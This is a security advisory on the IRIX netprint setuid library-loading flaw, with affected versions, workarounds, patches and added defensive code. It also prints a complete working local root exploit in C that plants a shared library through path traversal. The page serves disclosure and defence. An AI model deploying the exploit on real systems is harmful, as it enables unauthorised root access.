IRIX 'netprint' Arbitrary Dynamic Library Loading Vulnerability
Release date: 2001-05-02
Update date: 2001-07-26
Affected systems:
SGI IRIX 6.5.12m
SGI IRIX 6.5.12f
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0.1
SGI IRIX 6.0
SGI IRIX 5.3
Unaffected systems:
SGI IRIX 6.5.13
Description:
BUGTRAQ ID: 2656
CVE CAN ID: CAN-2001-0485
The netprint utility shipped with SGI IRIX submits print jobs to remote hosts and is installed setuid-to-root by default. netprint takes a network type from the -n command-line option and opens the dynamic library that corresponds to the string following -n. netprint performs no validation on this string, so an attacker can supply a dynamic library of their own. Because netprint itself is setuid-to-root, the attacker-supplied code runs as root. Although only the lp user can execute netprint, in many early IRIX versions lp is a default account with no password. If the lp account has not been disabled, a remote attacker can log in as lp and use the netprint vulnerability to obtain root privileges.
<* Source: Vade79 (v9@realhalo.org) *>
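The root cause described above is a setuid program that turns a caller-supplied string straight into a library path. The following C program is an added example, written for this page and not SGI's code or any part of the advisory, showing how a privileged program should treat such an argument: the network type must be a bare allowlisted identifier (no separators, no dots), the path is built under a fixed directory, and the resulting file is checked to be root-owned and not writable by others before it would be handed to dlopen. The module directory, the allowlist entries and the ".so" naming are assumptions; the dlopen call itself is left out so the example links without extra libraries.

```c
/* Added example, not SGI code: validate a "network type" argument before
 * it can become a library path. MODULE_DIR, the allowlist and the ".so"
 * naming are assumptions made for the example. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

#define MODULE_DIR "/usr/lib/print"   /* assumed location of network modules */
#define MAX_NAME   32

/* Hypothetical allowlist of the network-type modules the program ships. */
static const char *const known_modules[] = { "bsd", "sysv", "tcpip" };

/* Return 1 if name is a bare, allowlisted identifier ([a-z0-9_] only), else 0. */
int network_type_is_valid(const char *name)
{
    size_t i, n;
    if (name == NULL) return 0;
    n = strlen(name);
    if (n == 0 || n > MAX_NAME) return 0;
    for (i = 0; i < n; i++) {
        char c = name[i];
        /* no '/', no '.', no control or shell characters: traversal is impossible */
        if (!((c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') || c == '_'))
            return 0;
    }
    for (i = 0; i < sizeof known_modules / sizeof known_modules[0]; i++)
        if (strcmp(known_modules[i], name) == 0)
            return 1;
    return 0;   /* syntactically fine, but not a module we know */
}

/* Build MODULE_DIR/<name>.so into out. Returns 0 on success, -1 if the name
 * fails validation or the buffer is too small (never a truncated path). */
int resolve_network_module(const char *name, char *out, size_t outlen)
{
    int written;
    if (!network_type_is_valid(name)) return -1;
    written = snprintf(out, outlen, "%s/%s.so", MODULE_DIR, name);
    if (written < 0 || (size_t)written >= outlen) return -1;
    return 0;
}

/* Return 1 if path is a regular file owned by root with no group/other write
 * bit. A setuid program should refuse to load anything that fails this. */
int module_file_is_trusted(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

int main(int argc, char **argv)
{
    char path[256];
    /* constructed default input: a traversal string of the kind the advisory describes */
    const char *name = argc > 1 ? argv[1] : "../../../../tmp/anything";
    if (resolve_network_module(name, path, sizeof path) != 0) {
        fprintf(stderr, "refusing network type '%s'\n", name);
        return 1;
    }
    if (!module_file_is_trusted(path)) {
        fprintf(stderr, "refusing untrusted module file %s\n", path);
        return 1;
    }
    printf("would dlopen %s\n", path);   /* dlopen omitted to keep the example link-free */
    return 0;
}
```

Run with no argument and the traversal string is rejected at the first check; run with "tcpip" and the example resolves /usr/lib/print/tcpip.so and then refuses it unless that file exists, is root-owned and is not group/world writable. Doing the ownership check after resolution matters because the allowlist protects against traversal, not against a writable module directory.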
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!
/* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org]. this will
   give you uid=0 on IRIX systems. this exploit simply takes advantage of
   netprint's -n option to execute arbitrary code and gain elevated
   privileges.

   example:
   ------------------------------------------------------------------------------
   $ cc xnetprint.c -o xnetprint
   $ id
   uid=9(lp) gid=9(lp)
   $ ./xnetprint /bin/sh
   [(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
   [*] making symbols source file for netprint to execute.
   [*] done, now compiling symbols source file.
   [*] done, now checking to see if the symbols source compiled.
   [*] done, now executing netprint.
   [*] success, uid: 0, euid: 0, gid: 0, egid: 0.
   # id
   uid=0(root) gid=0(sys)
   #
   ------------------------------------------------------------------------------

   note: built and tested on IRIX 6.2. this often requires the uid of lp
   to work correctly. though, should prove effective up to 6.4 or
   higher.
*/
#include <stdio.h>
#include <stdlib.h>      /* exit(), malloc(), system() */
#include <string.h>      /* strlen() */
#include <unistd.h>
#include <sys/stat.h>
#define PATH "/usr/lib/print/netprint"            /* path to exploitable program. */
#define CCPATH "/usr/bin/cc"                      /* path to compiler. */
#define SRCFILE "/tmp/xnetprintso.c"              /* path to temporary symbols source. */
#define SOFILE "/tmp/xnetprintso.so"              /* path to compile as. */
#define FAKESOFILE "../../../../tmp/xnetprintso"  /* arg to feed netprint. */

/* remove the temporary source and shared object; exit with i if i is non-zero. */
void cleanup(unsigned short i){
  if(!access(SRCFILE,F_OK))
    unlink(SRCFILE);
  if(!access(SOFILE,F_OK))
    unlink(SOFILE);
  if(i)
    exit(i);
}
int main(int argc,char **argv){
  char *syscmd;
  struct stat mod;
  FILE *symbol;
  printf("[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]\n");
  if(argc<2){
    printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
    cleanup(1);
  }
  /* sanity checks: target present, setuid root, payload and compiler executable. */
  if(stat(PATH,&mod)){
    printf("[!] failed, could not get stats on %s.\n",PATH);
    cleanup(1);
  }
  if(mod.st_uid||!(S_ISUID&mod.st_mode)){
    printf("[!] failed, %s is not setuid root.\n",PATH);
    cleanup(1);
  }
  if(access(argv[1],X_OK)){
    printf("[!] failed, %s doesn't seem to exist or is not executable.\n",argv[1]);
    cleanup(1);
  }
  if(access(CCPATH,X_OK)){
    printf("[!] failed, %s compiler doesn't seem to exist or is not executable.\n",CCPATH);
    cleanup(1);
  }
  printf("[*] making symbols source file for netprint to execute.\n");
  cleanup(0);
  if(!(symbol=fopen(SRCFILE,"w"))){
    printf("[!] failed, could not open temporary file to write to.\n");
    cleanup(1);
  }
  /* write the source of the shared object; it exports the symbols netprint expects. */
  fprintf(symbol,"#include <stdio.h>\n");
  fprintf(symbol,"#include <unistd.h>\n");
  fprintf(symbol,"void OpenConn(){\n");
  fprintf(symbol," seteuid(0);\n");
  fprintf(symbol," setuid(0);\n");
  fprintf(symbol," setegid(0);\n");
  fprintf(symbol," setgid(0);\n");
  fprintf(symbol," printf(\"[*] success, uid: %%u, euid: %%u, gid: %%u, egid: %%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
  fprintf(symbol," execl(\"%s\",\"%s\",(char *)0);\n",argv[1],argv[1]);
  fprintf(symbol,"}\n");
  fprintf(symbol,"void CloseConn(){}\n");
  fprintf(symbol,"void ListPrinters(){}\n");
  fprintf(symbol,"void SendJob(){}\n");
  fprintf(symbol,"void CancelJob(){}\n");
  fprintf(symbol,"void WaitForJob(){}\n");
  fprintf(symbol,"void GetQueue(){}\n");
  fprintf(symbol,"void StartTagging(){}\n");
  fprintf(symbol,"void StopTagging(){}\n");
  fprintf(symbol,"void Install(){}\n");
  fprintf(symbol,"void IsDest(){}\n");
  fclose(symbol);
  printf("[*] done, now compiling symbols source file.\n");
  /* 13 = length of the literal text in "%s %s -shared -o %s" */
  if(!(syscmd=(char *)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1))){
    printf("[!] failed, could not allocate memory.\n");
    cleanup(1);
  }
  sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
  system(syscmd);
  printf("[*] done, now checking to see if the symbols source compiled.\n");
  if(access(SOFILE,R_OK)){
    printf("[!] failed, symbols source was not compiled properly.\n");
    cleanup(1);
  }
  printf("[*] done, now executing netprint.\n");
  if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",(char *)0)){
    printf("[!] failed, %s did not execute properly.\n",PATH);
    cleanup(1);
  }
  return 0;
}
Recommendations:
Temporary workaround:
Remove the setuid bit from netprint:
% /bin/su -
Password:
#
# /bin/chmod 500 /usr/lib/print/netprint
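The workaround above is a one-off command; an administrator with many hosts wants to be able to check for the setuid bit and apply the same chmod 500 repeatably. The script below is an added example written for this page, not part of the advisory, and uses only POSIX ls, awk and chmod so it can run under an old IRIX /bin/sh. The target path is the advisory's; the function names and the return-code convention are assumptions.

```sh
#!/bin/sh
# Added example (not part of the advisory): audit a setuid helper and apply
# the advisory's workaround (chmod 500) when the setuid bit is present.
# Only POSIX ls/awk/chmod are used. The path is from the advisory; the
# function names and return codes are assumptions made for this example.

NETPRINT=/usr/lib/print/netprint

# Return 0 if the file has the setuid bit (4th character of the ls mode
# string is 's' or 'S'), 1 if not, 2 if the file cannot be listed.
has_setuid_bit() {
    mode=$(ls -ld "$1" 2>/dev/null) || return 2
    case "$mode" in
        ???s*|???S*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the owner of a file (third field of ls -ld output).
owner_of() {
    ls -ld "$1" 2>/dev/null | awk '{print $3}'
}

# Apply the advisory's workaround: owner read/execute only, no setuid bit.
drop_setuid() {
    chmod 500 "$1"
}

# Audit one file (default: netprint). Returns 0 if nothing had to change,
# 1 if the setuid bit was present and has just been removed.
audit_setuid_helper() {
    f=${1:-$NETPRINT}
    if [ ! -e "$f" ]; then
        echo "$f: not present, nothing to do"
        return 0
    fi
    if has_setuid_bit "$f"; then
        echo "$f: setuid bit set (owner $(owner_of "$f")), applying chmod 500"
        drop_setuid "$f"
        return 1
    fi
    echo "$f: setuid bit not set"
    return 0
}

# When run as a script, audit the advisory's path (or the path given as $1).
audit_setuid_helper "$@"
```

Because the audit function returns 1 exactly when it changed something, the script can be wired into a cron job or configuration check that reports only the hosts where netprint had regained the setuid bit, for example after a patch or reinstall restored the original permissions.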
Vendor patches:
A security advisory (20010701-01-P) and corresponding patches have been released for IRIX:
OS Version        Vulnerable?   Patch #
----------        -----------   -------
IRIX 3.x          unknown
IRIX 4.x          unknown
IRIX 5.x          unknown
IRIX 6.0.x-6.4    unknown
IRIX 6.5-6.5.11   yes
IRIX 6.5.12m      yes           4310
IRIX 6.5.12f      yes           4311
IRIX 6.5.13       no
SGI security patches can be downloaded from:
http://www.sgi.com/support/security/
ftp://patches.sgi.com/support/free/security/patches/